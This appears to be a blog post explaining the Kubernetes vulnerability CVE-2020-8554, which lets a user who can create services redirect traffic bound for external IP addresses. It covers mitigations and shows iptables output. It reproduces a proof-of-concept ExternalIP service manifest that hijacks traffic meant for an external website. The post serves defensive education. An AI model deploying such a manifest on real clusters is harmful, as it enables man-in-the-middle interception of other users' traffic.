Unpatchable Vulnerabilities of Kubernetes: CVE-2020-8554
In some of the talks I've done on Kubernetes security over the past couple of years, I've discussed the four unpatchable security vulnerabilities in Kubernetes, which are present in every cluster regardless of the version or patch level used. These CVEs require cluster operators to enable or block specific features or adapt their security architecture to account for them.
Each of the vulnerabilities is quite interesting, as it exposes some of the inner workings of Kubernetes clusters and their underlying technologies. All four of the vulnerabilities relate to container networking in one way or another, so present a good way to learn more about the topic!
CVE-2020-8554 overview and mitigation
The first of our unpatchable four vulnerabilities is CVE-2020-8554, which was originally discovered by Etienne Champetier. This vulnerability allows a hostile actor in a Kubernetes cluster, who can create service objects to hijack traffic intended for an external website and send it to a Kubernetes pod under their control.
To mitigate this vulnerability, cluster operators need to block the use of "ExternalIP" services. There are a number of ways to do this, either using the DenyServiceExternalIPs admission controller or using a general policy-based controller like Kyverno to block their creation. You could also implement checks elsewhere in the object lifecycle, for example, if you're using a GitOps approach to cluster management. Additionally, it's worth noting that if you're using Cilium as a cluster CNI with its "kube-proxy replacement," you're not affected by this CVE.
Depending on the threat model for your cluster, you might not need to prioritize mitigating this issue. It fundamentally depends on there being a hostile user in the cluster who can create service objects, so if you have a very small number of trusted users in your cluster, this may not present a large risk.
CVE-2020-8554 technical details
What's interesting about this CVE is how it actually works. To talk about that, we need to first discuss the kube-proxy component of Kubernetes, which is responsible for service networking. This component runs on every worker node in a cluster and manages aspects of networking using firewall rules. Traditionally, this is iptables, although it can also use IPVS, or on modern clusters, nftables.
What this boils down to is that, when you create a service object in a cluster, kube-proxy will generate new iptables rules to route traffic that's sent to the service IP address onward to a different destination, usually a pod.
First, let’s look at a standard example. If we have a service that works with a deployment of the nginx web server, it might look like this.
apiVersion: v1
kind: Service
metadata:
name: nginx-service
spec:
selector:
app: nginx
ports:
- protocol: TCP
port: 80
targetPort: 80
type: ClusterIP
If we then look at the iptables NAT rules on the cluster node, we can see entries created for that service, first in the KUBE-SERVICES chain.
Chain KUBE-SERVICES (2 references)
5 0 0 KUBE-SVC-V2OKYYMBY3REGZOG 6 -- * * 0.0.0.0/0 10.96.96.147 /* default/nginx-service cluster IP */ tcp dpt:80
And then a new iptables chain is created for the service, where it redirects traffic from the service IP address to one of the pods supporting the service (in this case our deployment has three pods, so it has rules for each one with a probability attached).
Chain KUBE-SVC-V2OKYYMBY3REGZOG (1 references)
num pkts bytes target prot opt in out source destination
1 0 0 KUBE-MARK-MASQ 6 -- * * !10.244.0.0/16 10.96.96.147 /* default/nginx-service cluster IP */ tcp dpt:80
2 0 0 KUBE-SEP-ZM4U5IBMH7HRYQAC 0 -- * * 0.0.0.0/0 0.0.0.0/0 /* default/nginx-service -> 10.244.0.10:80 */ statistic mode random probability 0.33333333349
3 0 0 KUBE-SEP-WGFHUWJ6JX2S3AJW 0 -- * * 0.0.0.0/0 0.0.0.0/0 /* default/nginx-service -> 10.244.0.8:80 */ statistic mode random probability 0.50000000000
4 0 0 KUBE-SEP-YF4SAX6DPLSRSFFX 0 -- * * 0.0.0.0/0 0.0.0.0/0 /* default/nginx-service -> 10.244.0.9:80 */
Where the vulnerability creeps in is in a specific type of service object, the ExternalIP service. This allows you to specify arbitrary external IP addresses and have traffic destined for them forwarded elsewhere in the cluster.
As an example, the service object below (taken from this POC) takes traffic destined for 104.16.185.241 or 104.16.184.241 (the IP addresses for icanhazip.com) and sends it to an echoserver pod in the cluster.
apiVersion: v1
kind: Service
metadata:
name: mitm-externalip
namespace: kubeproxy-mitm
spec:
ports:
- name: http
port: 80
targetPort: 8080
- name: https
port: 443
targetPort: 8443
selector:
app: echoserver
type: ClusterIP
externalIPs:
- 104.16.185.241
- 104.16.184.241
If we look at the iptables rules on the Kubernetes node after creating this service, we can see some new NAT rules, showing what's happened.
First, some new iptables rules have been added to the SERVICES chain, which match traffic being sent to those two IP addresses.
Chain KUBE-SERVICES (2 references)
num pkts bytes target prot opt in out source destination
4 0 0 KUBE-SVC-RBLPB57WNTQX7QAT 6 -- * * 0.0.0.0/0 10.96.206.161 /* kubeproxy-mitm/mitm-externalip:http cluster IP */ tcp dpt:80
5 0 0 KUBE-EXT-RBLPB57WNTQX7QAT 6 -- * * 0.0.0.0/0 104.16.185.241 /* kubeproxy-mitm/mitm-externalip:http external IP */ tcp dpt:80
6 1 60 KUBE-EXT-RBLPB57WNTQX7QAT 6 -- * * 0.0.0.0/0 104.16.184.241 /* kubeproxy-mitm/mitm-externalip:http external IP */ tcp dpt:80
7 0 0 KUBE-SVC-O76I5Y3LZD7UNKAZ 6 -- * * 0.0.0.0/0 10.96.206.161 /* kubeproxy-mitm/mitm-externalip:https cluster IP */ tcp dpt:443
8 0 0 KUBE-EXT-O76I5Y3LZD7UNKAZ 6 -- * * 0.0.0.0/0 104.16.185.241 /* kubeproxy-mitm/mitm-externalip:https external IP */ tcp dpt:443
9 0 0 KUBE-EXT-O76I5Y3LZD7UNKAZ 6 -- * * 0.0.0.0/0 104.16.184.241 /* kubeproxy-mitm/mitm-externalip:https external IP */ tcp dpt:443
And then two new iptables chains have been created redirecting the traffic matched by the initial rules.
Chain KUBE-SVC-RBLPB57WNTQX7QAT (2 references)
num pkts bytes target prot opt in out source destination
1 0 0 KUBE-MARK-MASQ 6 -- * * !10.244.0.0/16 10.96.206.161 /* kubeproxy-mitm/mitm-externalip:http cluster IP */ tcp dpt:80
2 1 60 KUBE-SEP-E5TK4BVO3WYA3RYQ 0 -- * * 0.0.0.0/0 0.0.0.0/0 /* kubeproxy-mitm/mitm-externalip:http -> 10.244.0.6:8080 */
Chain KUBE-SVC-O76I5Y3LZD7UNKAZ (2 references)
num pkts bytes target prot opt in out source destination
1 0 0 KUBE-MARK-MASQ 6 -- * * !10.244.0.0/16 10.96.206.161 /* kubeproxy-mitm/mitm-externalip:https cluster IP */ tcp dpt:443
2 0 0 KUBE-SEP-3YMEZLBEPIJTVSFJ 0 -- * * 0.0.0.0/0 0.0.0.0/0 /* kubeproxy-mitm/mitm-externalip:https -> 10.244.0.6:8443 */
So once you realize that services are essentially iptables rules and that we can create rules that match traffic destined for external IP addresses, the risk of traffic being redirected in an unauthorized manner makes sense!
Conclusion
This blog is the first part of a mini-series looking at the four unpatchable CVEs in every Kubernetes cluster. In the next installment, we’ll take a look at CVE-2020-8561 and explore some details of Kubernetes SSRF attacks.